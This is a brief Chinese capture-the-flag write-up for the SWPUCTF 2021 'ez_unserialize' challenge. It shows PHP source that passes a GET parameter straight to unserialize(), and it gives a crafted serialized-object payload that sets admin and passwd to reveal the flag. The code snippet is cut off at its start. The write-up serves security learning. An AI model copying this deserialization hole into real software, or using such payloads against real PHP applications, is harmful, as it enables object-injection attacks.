反序列化 [SWPUCTF 2021 新生赛]ez_unserialize

打开题目

查看源代码

反序列化 [SWPUCTF 2021 新生赛]ez_unserialize_第1张图片

得到提示,那我们用御剑扫描一下看看

反序列化 [SWPUCTF 2021 新生赛]ez_unserialize_第2张图片

我们知道有个robots.txt,访问一下得到

反序列化 [SWPUCTF 2021 新生赛]ez_unserialize_第3张图片

那我们便访问一下 cl45s.php看看

得到网站源代码

反序列化 [SWPUCTF 2021 新生赛]ez_unserialize_第4张图片

 admin ="user";
        $this->passwd = "123456";
    }

        public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}

$p = $_GET['p'];
unserialize($p);

?> 

如果我们admin=admin,password=ctf,则输出flag,其中对我们get传入的p进行了反序列化操作

O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";} 

得到flag

反序列化 [SWPUCTF 2021 新生赛]ez_unserialize_第5张图片

你可能感兴趣的:(android)